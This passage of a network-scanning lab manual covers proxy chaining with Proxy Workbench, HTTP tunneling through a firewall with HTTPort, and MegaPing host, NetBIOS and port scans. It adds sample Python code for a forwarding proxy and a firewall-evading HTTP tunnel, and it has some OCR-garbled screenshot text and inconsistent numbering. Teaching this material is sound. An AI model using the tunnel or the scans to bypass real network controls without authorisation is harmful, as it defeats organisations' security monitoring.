[Figure: Proxy Workbench main window monitoring 10.0.0.7 on SMTP - Outgoing e-mail (25), POP3 - Incoming e-mail (110), HTTP Proxy - Web (8080), HTTPS Proxy - Secure Web (443), FTP - File Transfer Protocol (21) and Pass Through - For Testing Apps (1000); the "Real time data for All Activity" pane shows a hex/ASCII dump of a browser request carrying User-Agent, Proxy-Connection: keep-alive and Host: mail.google.com headers; status bar: Memory: 95 KByte, Sockets: 100, Events: 754]

FIGURE 13.6: Proxy Workbench main window

14. Go to Tools on the toolbar, and select Configure Ports.

The Events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File > Clear All Data) this will decrease to zero if there are no connections that are alive.

The last panel displays the current time as reported by your operating system.
FIGURE 13.7: Proxy Workbench Configure Ports option
15. In the Configure Proxy Workbench wizard, select 8080 HTTP Proxy - Web in the left pane, Ports to listen on.
16. Check HTTP in the right pane, Protocol assigned to port 8080, and click Configure HTTP for port 8080.
FIGURE 13.8: Proxy Workbench configuring HTTP for port 8080
17. The HTTP Properties window appears. Check Connect via another proxy, enter the IP address of the Windows Server 2008 virtual machine in Proxy server, enter 8080 in Port, and then click OK.
The "Show the real time data window" option lets you choose whether the real-time data pane is displayed.
People who benefit from Proxy Workbench:
■ Home users who have taken the first step in understanding the Internet and are starting to ask "But how does it work?"
■ People who are curious about how their web browser, email client, or FTP client communicates with the Internet.
■ People who are concerned about malicious programs sending sensitive information out to the Internet; the information that programs are sending can be readily identified.
■ Internet software developers who are writing programs to existing protocols. Software development for the Internet is often very complex, especially when a program is not properly adhering to a protocol; Proxy Workbench lets developers identify protocol problems instantly.
■ Internet software developers who are creating new protocols and developing the client and server software simultaneously; Proxy Workbench helps them identify where the protocol is not being followed.
■ Internet security experts, who benefit from seeing the data flowing in real time; this helps them see who is doing what and when.
Many people understand sockets much better than they think. When you surf the web and go to a site such as www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altavista.com" on port number 80.
FIGURE 13.9: Proxy Workbench HTTP for port 8080
18. Click Close in the Configure Proxy Workbench wizard after completing the configuration settings.
Real-time logging lets you record everything Proxy Workbench does to a text file, so the information can be imported into a spreadsheet or database for more advanced analysis.
19. Repeat the Proxy Workbench configuration steps (Step 11 to Step 15) on the Windows Server 2008 virtual machine.
FIGURE 13.10: Proxy Workbench configured proxy (HTTP Properties: Connect via another proxy, Proxy server 10.0.0.7, Port 8080)
20. In Windows Server 2008, enter the IP address of the Windows 7 virtual machine as the proxy server.
21. Open a Firefox browser in Windows Server 2008 and browse web pages.
22. Proxy Workbench shows the generated traffic, as in the following figure.
23. Check the To column: the traffic is being forwarded to 10.0.0.3 (the Windows Server 2008 virtual machine).
FIGURE 13.11: Proxy Workbench generated traffic on the Windows Server 2012 host machine
24. Now log in to the Windows Server 2008 virtual machine and check the To column; it is forwarding the traffic to 10.0.0.7 (the Windows 7 virtual machine).
FIGURE 13.12: Proxy Workbench generated traffic on the Windows Server 2008 virtual machine
Proxy Workbench is not only a proxy server: you can see all of the data flowing through it, visually display a socket connection history, and save it to HTML.
Proxy Workbench also includes connection failure simulation strategies, which let you simulate a poor network, a slow Internet connection, or an unresponsive server. This makes it a useful TCP application tester.
25. Select On the web server, connect to port 80 on the Windows 7 virtual machine, and click OK.
FIGURE 13.13: Configuring HTTP properties in Windows 7
Proxy Workbench lets you see how your email client communicates with the email server, how web pages are delivered to your browser, and why your FTP client is not connecting to its server.
26. Now check the traffic on 10.0.0.7 (the Windows 7 virtual machine). The To column shows traffic generated by the different websites browsed in Windows Server 2008.
In the Connection Tree, if a protocol or a client/server pair is selected, the Details pane displays the summary information of all the socket connections in progress for the selected item.
FIGURE 13.14: Proxy Workbench generated traffic on the Windows 7 virtual machine
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
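The chain built in Steps 17 to 25 is three forwarding proxies: each hop either hands the request to the next proxy (Connect via another proxy) or, at the last hop, opens the origin server itself (On the web server, connect to port 80). The following Python program is an added example for this lab, not Proxy Workbench code. It implements those two HTTP Properties choices as one function, plan_hop, and prints a From/To/Protocol/Started row like the Details pane. The lab addresses 10.0.0.3 and 10.0.0.7 and the request visible in Figure 13.7 are reused as constructed sample input; the function names and the small in-process listener are illustrative.

```python
"""Minimal HTTP forwarding proxy illustrating the two Proxy Workbench modes.

Added example, not Proxy Workbench code. Each listener is one hop of the
lab's chain; upstream=None is the "On the web server" setting, upstream=(h, p)
is "Connect via another proxy". One request per connection, for brevity.
"""
import socket
import socketserver
import threading
from datetime import datetime

PROXY_HOP_HEADERS = {"proxy-connection", "proxy-authorization"}


def parse_request(raw: bytes):
    """Split an HTTP/1.x request into (method, target, version, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return method, target, version, headers, body


def plan_hop(raw: bytes, upstream=None):
    """Decide where this hop connects and what it sends there.

    upstream=(host, port): forward the request untouched (absolute URI kept),
    exactly as a browser sent it to us, so the next proxy can route it.
    upstream=None: we are the last hop; connect to the origin named in the
    absolute URI (or Host header), send an origin-form request line and drop
    the hop-by-hop proxy headers. Returns (host, port, outbound_bytes).
    """
    method, target, version, headers, body = parse_request(raw)
    if upstream is not None:
        return upstream[0], upstream[1], raw
    if target.lower().startswith("http://"):          # absolute-form request
        authority, _, path = target[7:].partition("/")
        path = "/" + path
    else:                                              # origin-form request
        authority = next((v for n, v in headers if n.lower() == "host"), "")
        path = target
    host, _, port = authority.partition(":")
    port = int(port) if port else 80
    kept = [(n, v) for n, v in headers if n.lower() not in PROXY_HOP_HEADERS]
    out = f"{method} {path} {version}\r\n".encode("iso-8859-1")
    out += "".join(f"{n}: {v}\r\n" for n, v in kept).encode("iso-8859-1")
    return host, port, out + b"\r\n" + body


def log_entry(client, host, port, protocol="HTTP", now=None):
    """One row like the Details pane: From, To, Protocol, Started (tenths)."""
    now = now or datetime.now()
    started = f"{now:%H:%M:%S}.{now.microsecond // 100000}"
    return f"{client[0]}:{client[1]} -> {host}:{port} {protocol} {started}"


class Relay(socketserver.BaseRequestHandler):
    """Each accepted client connection becomes one hop in the chain."""
    upstream = None  # overridden per listener by run_proxy

    def handle(self):
        raw = self.request.recv(65536)               # simplification: one read
        if not raw:
            return
        host, port, out = plan_hop(raw, self.upstream)
        print(log_entry(self.client_address, host, port))
        with socket.create_connection((host, port), timeout=10) as nxt:
            nxt.sendall(out)
            nxt.shutdown(socket.SHUT_WR)
            while chunk := nxt.recv(65536):
                self.request.sendall(chunk)


def run_proxy(port, upstream=None):
    """Listen on 127.0.0.1:port; upstream=(host, port) chains to another proxy."""
    handler = type("Hop", (Relay,), {"upstream": upstream})
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", port), handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Constructed request modelled on the one visible in Figure 13.7: the browser
# sends an absolute URI plus Proxy-Connection, as it does to any proxy.
SAMPLE = (b"GET http://mail.google.com/ HTTP/1.1\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) "
          b"Gecko/20100101 Firefox/14.0.1\r\n"
          b"Proxy-Connection: keep-alive\r\n"
          b"Host: mail.google.com\r\n\r\n")

if __name__ == "__main__":
    # The lab chain: 2012 host -> 10.0.0.3 (2008) -> 10.0.0.7 (Win7) -> origin
    for hop, up in (("host", ("10.0.0.3", 8080)),
                    ("10.0.0.3", ("10.0.0.7", 8080)),
                    ("10.0.0.7", None)):
        host, port, out = plan_hop(SAMPLE, up)
        print(hop, "connects to", host, port, "sends", out.split(b"\r\n")[0])
```

Running it prints the three hops' decisions: the first two connect to the next proxy on 8080 and leave the absolute URI in place, the last connects to mail.google.com:80 and sends "GET / HTTP/1.1" with Proxy-Connection removed. That is precisely what the To column in Figures 13.11 to 13.14 records at each machine, and it is why a proxy that is told to "connect to port 80" must rewrite the request line while a chained proxy must not.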
Tool/Utility: Proxy Workbench
Information Collected/Objectives Achieved:
■ Proxy server used: 10.0.0.7
■ Port scanned: 8080
■ Result: Traffic captured by the Windows 7 virtual machine (10.0.0.7)
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine the connection failure options: termination and refusal.
2. Evaluate how real-time logging records everything in Proxy Workbench.
Internet Connection Required: Yes
Platform Supported: Classroom
HTTP Tunneling Using HTTPort
HTTPort is a program that works with HTTHost to make a transparent tunnel through a proxy server or firewall.
Lab Scenario
Attackers are always hunting for clients that can be easily compromised, and they can enter these networks with IP spoofing to damage or steal data. An attacker can get packets through a firewall by spoofing the IP address. If attackers are able to capture network traffic, as you learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, and so on, which can be disastrous for an organization's network. An attacker may use a network probe to capture raw packet data and then use it to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TTL), and protocol type.
Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic, such as source and destination IP addresses, protocol type, header length, and source and destination ports, and comparing these details with modeled attack signatures to determine whether an attack has occurred. You can also check the attack logs for the list of attacks and take evasive action. You should also be familiar with the HTTP tunneling technique, through which you can identify additional security risks that are not readily visible from simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic within a communication channel.
In this lab you will learn HTTP tunneling using HTTPort.
Lab Objectives
This lab will show you how networks can be scanned and how to use HTTPort and HTTHost.
Lab Environment
In the lab, you need the HTTPort tool.
■ HTTPort is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort
■ You can also download the latest version of HTTPort from http://www.targeted.org/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Install HTTHost on the Windows Server 2008 virtual machine
■ Install HTTPort on the Windows Server 2012 host machine
■ Follow the wizard-driven installation steps and install it
■ Administrative privileges are required to run this tool
■ This lab might not work if the remote server filters/blocks HTTP tunneling packets
Lab Duration
Time: 20 Minutes
Overview of HTTPort
HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy. It bypasses HTTP proxies, HTTP firewalls, and transparent accelerators.
Lab Tasks
1. Before running the tool, you need to stop the IIS Admin Service and the World Wide Web Publishing Service on the Windows Server 2008 virtual machine, because HTTHost will listen on port 80.
2. Go to Administrative Tools > Services > IIS Admin Service, right-click it, and click Stop.
FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008
3. Go to Administrative Tools > Services > World Wide Web Publishing Service, right-click it, and click Stop.
HTTPort bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server.
FIGURE 14.2: Stopping World Wide Web Publishing Service in Windows Server 2008
4. Open the mapped network drive "CEH-Tools": Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost
5. Open the HTTHost folder and double-click htthost.exe.
6. The HTTHost window opens; select the Options tab.
7. On the Options tab, leave all settings at their defaults except the Personal password field, which should be filled in with a password of your choice. In this lab, the personal password is "magic".
HTTHost supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.
8. Check the Revalidate DNS names and Log connections options and click Apply.
FIGURE 14.3: HTTHost Options tab (Port 80, Personal password, Revalidate DNS names, Log connections)
9. Now leave HTTHost running, and do not turn off the Windows Server 2008 virtual machine.
10. Switch to the Windows Server 2012 host machine and install HTTPort from D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort by double-clicking httport3snfm.exe.
11. Follow the wizard-driven installation steps.
12. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 14.4: Windows Server 2012 desktop view
13. Click the HTTPort 3.SNFM app to open the HTTPort 3.SNFM window.
To use HTTPort, point your browser (or other client) to 127.0.0.1. HTTPort comes with a predefined mapping, "External HTTP proxy", on a local port.
FIGURE 14.5: Windows Server 2012 apps view
14. The HTTPort 3.SNFM window appears as shown in the figure that follows.
For each application you create a custom mapping covering the addresses it uses. For applications that dynamically change ports, there is a SOCKS4 proxy mode, in which HTTPort runs a local SOCKS server on 127.0.0.1.
FIGURE 14.6: HTTPort main window
15. Select the Proxy tab and enter the host name or IP address of the targeted machine.
16. Here, as an example, enter the IP address of the Windows Server 2008 virtual machine and enter port number 80.
17. The Username and Password fields under Proxy requires authentication are not used here; leave them empty.
18. In the Use personal remote host at section, click Start and then Stop, and then enter the targeted host machine IP address and port, which should be 80.
19. Enter the password "magic" here, matching the personal password set in HTTHost in Step 7; any password can be used as long as both sides agree.
In real-world environments, companies sometimes use a password-protected proxy to let employees access the Internet.
FIGURE 14.7: HTTPort Proxy settings window (Host 10.0.0.4, Port 80; personal remote host 10.0.0.4, Port 80, with password)
20. Select the Port mapping tab and click Add to create a New mapping.
HTTHost supports registration, but it is free and password-free: you will be issued a unique ID, with which you can contact the support team and ask questions.
21. Select the New mapping node, right-click New mapping, and click Edit.
FIGURE 14.8: HTTPort creating a new mapping
FIGURE 14.9: HTTPort editing a mapping
22. Rename the mapping to ftp certified hacker, select the Local port node, right-click, click Edit, and set the port value to 21.
23. Right-click the Remote host node, click Edit, and set it to ftp.certifiedhacker.com.
24. Right-click the Remote port node, click Edit, and set the port value to 21.
FIGURE 14.10: HTTPort static TCP/IP port mapping (Local port 21, Remote host ftp.certifiedhacker.com, Remote port 21)
25. Click Start on the Proxy tab of HTTPort to run the HTTP tunneling.
In this kind of environment, the federated search web part of Microsoft Search Server 2008 will not work out of the box, because it only supports proxies that are not password protected.
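The mapping from Steps 20 to 25 works because HTTPort turns every chunk of the local FTP connection on port 21 into an ordinary HTTP request to HTTHost on port 80, and HTTHost opens the real TCP connection to ftp.certifiedhacker.com:21 on the client's behalf. The Python program below is an added example for this lab, not HTTPort or HTTHost code, and it reduces that idea to its framing: a client that wraps the stream, and a server that checks the personal password, keeps one outbound socket per session, and forwards the bytes. The /tunnel path, the X-Tunnel-* header names and the base64 body encoding are assumptions made for illustration; the lab address 10.0.0.4, the FTP target and the password "magic" come from the steps above, and the FTP server is a constructed stand-in so the program runs offline.

```python
"""HTTP tunnelling in the HTTPort/HTTHost style, reduced to its framing.

Added example for this lab, not HTTPort or HTTHost code. The /tunnel path,
the X-Tunnel-* header names and the base64 body encoding are assumptions
made for illustration; the real HTTPort wire format is not shown on this page.
"""
import base64
import secrets
import socket

TUNNEL_PATH = "/tunnel"              # assumed
HDR_TARGET = "X-Tunnel-Target"       # assumed: "host:port" of the mapped remote
HDR_SESSION = "X-Tunnel-Session"     # assumed: session id issued by the server
HDR_PASSWORD = "X-Tunnel-Password"   # assumed: carries the HTTHost personal password


def client_open(remote_host, remote_port, password, server_host):
    """Ask the tunnel server (HTTHost's role) to open TCP to remote_host:port."""
    return (f"POST {TUNNEL_PATH} HTTP/1.1\r\nHost: {server_host}\r\n"
            f"{HDR_TARGET}: {remote_host}:{remote_port}\r\n"
            f"{HDR_PASSWORD}: {password}\r\nContent-Length: 0\r\n\r\n").encode()


def client_send(session, payload, server_host):
    """Wrap one chunk of the mapped TCP stream (FTP commands here) in a POST.
    A proxy or firewall sees only an HTTP POST to a web server on port 80."""
    body = base64.b64encode(payload)
    return (f"POST {TUNNEL_PATH} HTTP/1.1\r\nHost: {server_host}\r\n"
            f"{HDR_SESSION}: {session}\r\nContent-Type: application/octet-stream\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body


def client_unwrap(raw):
    """Return (status, payload) from a tunnel server reply."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status = head.split(b"\r\n")[0].split(b" ", 1)[1].decode()
    return status, base64.b64decode(body)


def _parse(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    hdrs = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            hdrs[name.strip().lower()] = value.strip()
    return method, path, hdrs, body


def _reply(status, payload=b""):
    body = base64.b64encode(payload)
    return f"HTTP/1.1 {status}\r\nContent-Length: {len(body)}\r\n\r\n".encode() + body


class TunnelServer:
    """The HTTHost side: one outbound TCP connection per tunnel session."""

    def __init__(self, password, connect=socket.create_connection):
        self.password = password
        self.connect = connect        # injectable so the demo runs offline
        self.sessions = {}

    def handle(self, raw):
        method, path, h, body = _parse(raw)
        if method != "POST" or path != TUNNEL_PATH:
            return _reply("404 Not Found")          # looks like a plain web server
        if HDR_SESSION.lower() not in h:            # session setup
            if h.get(HDR_PASSWORD.lower()) != self.password:
                return _reply("403 Forbidden")      # wrong personal password
            host, _, port = h.get(HDR_TARGET.lower(), "").rpartition(":")
            if not host or not port.isdigit():
                return _reply("400 Bad Request")
            sid = secrets.token_hex(8)
            self.sessions[sid] = self.connect((host, int(port)))
            return _reply("200 OK", sid.encode())
        conn = self.sessions.get(h[HDR_SESSION.lower()])  # data for a session
        if conn is None:
            return _reply("403 Forbidden")
        conn.sendall(base64.b64decode(body))
        return _reply("200 OK", conn.recv(65536))


class FakeFtpServer:
    """Constructed stand-in for ftp.certifiedhacker.com:21 so the demo is
    offline; answers USER like an FTP daemon would. Same interface as a socket."""

    def __init__(self, addr):
        self.addr = addr
        self.pending = b"220 Service ready\r\n"

    def sendall(self, data):
        if data.startswith(b"USER "):
            self.pending += b"331 Password required\r\n"

    def recv(self, n):
        out, self.pending = self.pending, b""
        return out[:n]


def demo(password="magic"):
    """Open the Step 22-24 mapping (local 21 -> ftp.certifiedhacker.com:21)
    through the tunnel and push one FTP command across it."""
    server = TunnelServer(password, connect=FakeFtpServer)
    status, sid = client_unwrap(server.handle(
        client_open("ftp.certifiedhacker.com", 21, password, "10.0.0.4")))
    status2, reply = client_unwrap(server.handle(
        client_send(sid.decode(), b"USER anonymous\r\n", "10.0.0.4")))
    return status, status2, reply


if __name__ == "__main__":
    print(demo())
```

Two points for the defender follow from the code. First, the HTTP server on port 80 answers 404 to anything that is not a tunnel request, so from the outside HTTHost is indistinguishable from a web server; the only signal a proxy log keeps is a stream of same-sized POSTs to one URL with binary bodies, and with HTTHost's traffic encryption even the body offers nothing. Second, the personal password is the only thing stopping anyone who finds the listener from using it as a relay, which is why Step 7 insists on setting one.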
FIGURE 14.11: HTTPort starting the tunnel
26. Now switch to the Windows Server 2008 virtual machine and click the Application log tab in HTTHost.
27. Check the last line: if it reads LISTENER: listening at 0.0.0.0:80, HTTHost is running properly.
HTTP is the basis for web surfing, so if you can freely surf the web from where you are, HTTPort will bring you the rest of the Internet applications.
FIGURE 14.12: HTTHost Application log (MAIN: HTTHOST 1.8.5 PERSONAL GIFTWARE DEMO starting; Project codename: 99 red balloons; Written by Dmitry Dvoinikov; (c) 1999-2004, Dmitry Dvoinikov; 64 total available connection(s); network started; RSA keys initialized; loaded filter "grant.dll" and "block.dll", total 2 filter(s) loaded; using transfer encoding: PrimeScrambler64/SevenTe; LISTENER: listening at 0.0.0.0:80)
To make a data tunnel through a password-protected proxy, you can map an external website to a local port and federate the search result.
28. Now switch to the Windows Server 2012 host machine and turn on Windows Firewall.
29. Go to Windows Firewall with Advanced Security.
  • 146. Module 03 - Scanning Networks 30. Select Outbound rules from die left pane of die window, and dien click New Rule in die right pane of die window. ‫־‬-■ - : ° ‫־‬Windows Firewall v/ith Advanced Security F ie Action View Help Outbound Rule* New Rule... V Filter by Profile V Filter by State 7 Filter by Group View O Refresh Export List... Q Help O utbound R u in Nam e Group Profile Inabied A © B ‫׳‬ anchCa(heC0nt«n:Rat1i«val (HTTP-0... BranchCache- Content Retc... A l No © B rsn ch C ech e H orfed Ca<t!e Cbent IHTT... BranchCache - Hosted Cech - A l No © B ra n c h C e ih e K n W J C •ch • S*rvw(HTTP. BranchCache - Hotted C a d i. A l No © B ra n ch C ache Peer Dncovery (W SD Out) B ran ch (arhr - PeerOtseove... A l No © C o ‫׳‬« Networking • D N S <U0P-0ut) Core Networking A l Yes ■ © C o r e Netw orking- D>1v> m -eH o*Config... Core Networking A l Yes © C o r e Networking ‫־‬ Dynam ic H ost Config... Core Networking A l Yes © C o r e N e tw o r k n g ‫־‬ Grcup Policy (ISA5S‫־‬~ Core Networking Deane■! Ves © C o r e Networking - 5 ‫׳‬cup P o k y (NP-Out) Core Networking Domain Yes © C oreN etw ork w ig - Group Policy CTCP-0-. Core Networking Deane•! Yes © C o r e N etworking - Internet Group Mana... Core Networking A l Yes © C o r e N etworlnng - IPHTTPS CTCP-Out] Core Networking A l Yes © C o r e N etworking - IPv6 (IP v 6 0 ‫־‬ut) Core Networking A l Ves © C o r e NetworVwg ‫־‬ M ulbeost listener Do-. Core Networking A l Ves © C o r e Networking - M ulocast Listener Q u~ Core Networking A l Yes © C o r e Network*!g - M ulticast I!stener Rep~ Core Networking A l Ves © C o r e Networking • M utecjst Listener Rep... Core Networking A l res © C o r e N etworking - N eighbor Dnc every A... Core Networking A l Ves © C o r e Networking N eighbor D iscoveryS.- Core Networking A l Yes © C o r e N rtw o fk n g ‫־‬ Packet 1c o Big (ICMP-. 
FIGURE 14.13: Windows Firewall with Advanced Security window in Windows Server 2008
31. In the New Outbound Rule Wizard, select the Port option in the Rule Type section and click Next.
FIGURE 14.14: Windows Firewall selecting a Rule Type
Note: the tools demonstrated in this lab are also available on the Z: mapped network drive in the virtual machines.
32. In the Protocol and Ports section, leave TCP selected, choose All remote ports, and click Next. (The rule is narrowed to port 21 in step 38; until then it blocks every outbound TCP connection, so do not leave it in that state on a machine you still need to use.)
FIGURE 14.15: Windows Firewall assigning Protocols and Ports
33. In the Action section, select the Block the connection option and click Next.
Note: HTTPort does not care about the proxy as such; it works with firewalls, transparent accelerators, NATs and anything else that lets the HTTP protocol through. HTTHost must be installed on a PC that is generally reachable from the Internet, typically your "home" PC: if you started a web server on that PC, everyone else would have to be able to connect to it. There are two showstoppers for HTTHost on home PCs.
FIGURE 14.16: Windows Firewall setting an Action
34. In the Profile section, select all three options so that the rule applies to Domain, Private and Public, and then click Next.
Note (HTTPort, continued): NAT/firewall issues: you need to open an incoming port. For HTTHost it is typically 80 (HTTP) or 443 (HTTPS), but any port can be used if the HTTP proxy at work allows it; some proxies are configured to permit only 80 and 443.
FIGURE 14.17: Windows Firewall Profile settings
35. Type Port 21 Blocked in the Name field and click Finish.
Note: the default TCP port for the FTP control connection is 21. Sometimes the local Internet Service Provider blocks this port, and this will result in FTP
FIGURE 14.18: Windows Firewall assigning a name to the port rule
36. The new rule Port 21 Blocked is created as shown in the following figure.
FIGURE 14.19: Windows Firewall new rule
37. Right-click the newly created rule and select Properties.
FIGURE 14.20: Windows Firewall new rule properties
38. Select the Protocols and Ports tab. Change the Remote port option to Specific Ports and enter the port number 21.
39. Leave the other settings at their defaults, click Apply, then click OK.
Note: HTTPort intercepts the local TCP connection and runs it through a tunnel across the proxy, which lets you bypass an HTTP proxy that otherwise blocks you from the Internet.
Note: with HTTPort you can use various Internet software from behind the proxy, e.g. e-mail, instant messengers, P2P file sharing, ICQ, news, FTP, IRC, etc. The basic idea is that you set up your Internet software
40. Type ftp ftp.certifiedhacker.com at the command prompt and press Enter. The connection is blocked on Windows Server 2008 by the firewall rule you just created.
FIGURE 14.21: Firewall Port 21 Blocked Properties
Note: HTTPort does not freeze or hang; what you are experiencing is known as "blocking operations".
FIGURE 14.22: ftp connection is blocked
41. Now open the command prompt on the Windows Server 2012 host machine, type ftp 127.0.0.1 and press Enter. The FTP client talks to the local port that HTTPort opens on the loopback address, and HTTPort carries the session through the HTTP tunnel instead of a direct port 21 connection.
Note: HTTPort makes it possible to open the client side of a TCP/IP connection and provide it to any software. The keywords here are "client" and "any software".
FIGURE 14.23: Executing ftp command
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: HTTPort
Information Collected/Objectives Achieved:
■ Proxy server used: 10.0.0.4
■ Port scanned: 80
■ Result: ftp 127.0.0.1 connected to 127.0.0.1
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. How do you set up HTTPort to use an e-mail client (Outlook, Messenger, etc.)?
2. Examine what to do if the software does not allow editing the address it connects to.
Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
Basic Network Troubleshooting Using MegaPing
MegaPing is a toolkit of essential utilities for information system administrators and IT solution providers.
Lab Scenario
You learned in the previous lab that HTTP tunneling is a technique in which the traffic of other network protocols is encapsulated inside HTTP. Any company that wants a presence on the Internet needs a web server, and these web servers are high-value targets for attackers. The attacker typically exploits the WWW server running IIS and gains command-line access to the system. Once a connection has been established, the attacker uploads a precompiled version of the HTTP tunnel server (hts). With the hts server set up, the attacker then starts a client on his or her own system and directs its traffic to the SRC (source) port of the system running the hts server. The hts process listens on port 80 of the WWW host and redirects traffic: it wraps the traffic in HTTP headers and forwards it to port 80 of the WWW server, after which the attacker tries to log in to the system; once access is gained, he or she sets up additional tools to further exploit the network.
MegaPing's security scanner checks your network for potential vulnerabilities that might be used to attack it, and saves the information in security reports. In this lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues.
Lab Objectives
This lab gives an insight into pinging a destination address list. It teaches how to:
■ Ping a destination address list
■ Traceroute
■ Perform NetBIOS scanning
Lab Environment
To carry out the lab, you need:
■ MegaPing, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\MegaPing
■ You can also download the latest version of MegaPing from http://www.magnetosoft.com/
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ Administrative privileges to run tools
■ TCP/IP settings correctly configured and an accessible DNS server
■ This lab will work in the CEH lab environment, on Windows Server 2012, Windows Server 2008, and Windows 7
Lab Duration
Time: 10 Minutes
Note: PING is often expanded as Packet Internet Groper, although that expansion is a backronym; the name comes from the sonar sound.
Overview of Ping
The ping command sends Internet Control Message Protocol (ICMP) echo request packets to the target host and waits for ICMP echo replies. During this request-response process, ping measures the time from transmission to reception, known as the round-trip time, and records any lost packets.
Lab Tasks
TASK 1: IP Scanning
1. Launch the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 13.1: Windows Server 2012 - Desktop view
2. Click the MegaPing app to open the MegaPing window.
FIGURE 15.2: Windows Server 2012 - Apps
3. The MegaPing main window appears as shown in the following figure.
FIGURE 15.3: MegaPing main window
4. Select any one of the options from the left pane of the window.
5. Select IP Scanner and type the IP range in the From and To fields; in this lab the range is 10.0.0.1 to 10.0.0.254. Click Start.
6. You can choose the IP range depending on your network.
Note: all scanners can scan individual computers, any range of IP addresses, domains, and selected types of computers inside domains. The security scanner provides the following information: NetBIOS names, configuration info, open TCP and UDP ports, transports, shares, users, groups, services, drivers, local drives, sessions, remote time of day, and printers.
FIGURE 15.4: MegaPing IP Scanning
7. It lists all the IP addresses in that range with their TTL (Time to Live), status (dead or alive), and statistics of the dead and alive hosts. In the lab run, 4 of the 254 addresses answered: 10.0.0.1 with a TTL of 64, and 10.0.0.4, 10.0.0.6 and 10.0.0.7 with a TTL of 128. The reply TTL is a first OS fingerprint: Linux and most Unix-like systems start at 64 and Windows at 128, and each router hop on the way back subtracts one, so on the local subnet you see the initial value unchanged.
FIGURE 15.5: MegaPing IP Scanning Report
8. Select the NetBIOS Scanner from the left pane and type the IP range in the From and To fields. In this lab, the IP range is 10.0.0.1 to 10.0.0.254. Click Start.
Note: the network utilities include DNS List Hosts, DNS Lookup Name, Network Time Synchronizer, Ping, Traceroute, Whois, and Finger.
TASK 2: NetBIOS Scanning
FIGURE 15.6: MegaPing NetBIOS Scanning
9. The NetBIOS scan lists all the hosts with their NetBIOS names and adapter addresses. In the lab run, three hosts answered: 10.0.0.4 and 10.0.0.6 (ADMIN-PC) in the workgroup WORKGROUP, both with adapter addresses beginning 00-15-5D, and 10.0.0.7 with an adapter address beginning D4-BE-D9. The 00-15-5D prefix is Microsoft's Hyper-V range, so those two hosts are virtual machines; the OUI of an adapter address is worth recording for exactly this reason.
FIGURE 15.7: MegaPing NetBIOS Scanning Report
10. Right-click the IP address. In this lab, the selected IP is 10.0.0.4; it will be different in your network.
11. Then select the Traceroute option from the context menu.
Note: MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more. Scan results can be saved in HTML or TXT reports, which can be used to secure your network, for example by shutting down unnecessary ports, closing shares, etc.
TASK 3: Traceroute
FIGURE 15.8: MegaPing Traceroute
12. The Traceroute window opens and traces the route to the selected IP address.
FIGURE 15.9: MegaPing Traceroute Report
TASK 4: Port Scanning
13. Select Port Scanner from the left pane, add www.certifiedhacker.com to the Destination Address List, and then click the Start button.
14. After you click Start, the button toggles to Stop.
15. It lists the ports found on www.certifiedhacker.com with the keyword (service name), risk, and port number.
Note: other features include a multithreaded design that processes any number of requests in any tool at the same time, real-time network connection status and protocol statistics, real-time process information and usage, real-time network information including network connections and open network files, system tray support, and more.
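Two points on this page come down to the same mechanism: in step 40 of the HTTPort lab the ftp client fails because an outbound firewall rule blocks TCP port 21, and in steps 13 to 15 above MegaPing's port scanner reports each port with a keyword and a state. The following added example is not code from HTTPort, MegaPing or the lab manual; it is a plain TCP connect probe in Python that classifies a port from the error the operating system returns to connect(). The target host, the port list, the two-second timeout and the loopback self-test are assumptions chosen for the example; the service-name lookup uses the OS services table and returns "?" where that table has no entry.

```python
"""TCP connect probe: classify a port as open, closed, filtered or blocked by
local policy from how connect() fails. Added example; not MegaPing's code."""
import errno
import socket
from typing import Dict, Iterable, Tuple

DEFAULT_TIMEOUT = 2.0  # assumed; a silently dropped SYN shows up as this timeout


def probe_port(host: str, port: int, timeout: float = DEFAULT_TIMEOUT) -> str:
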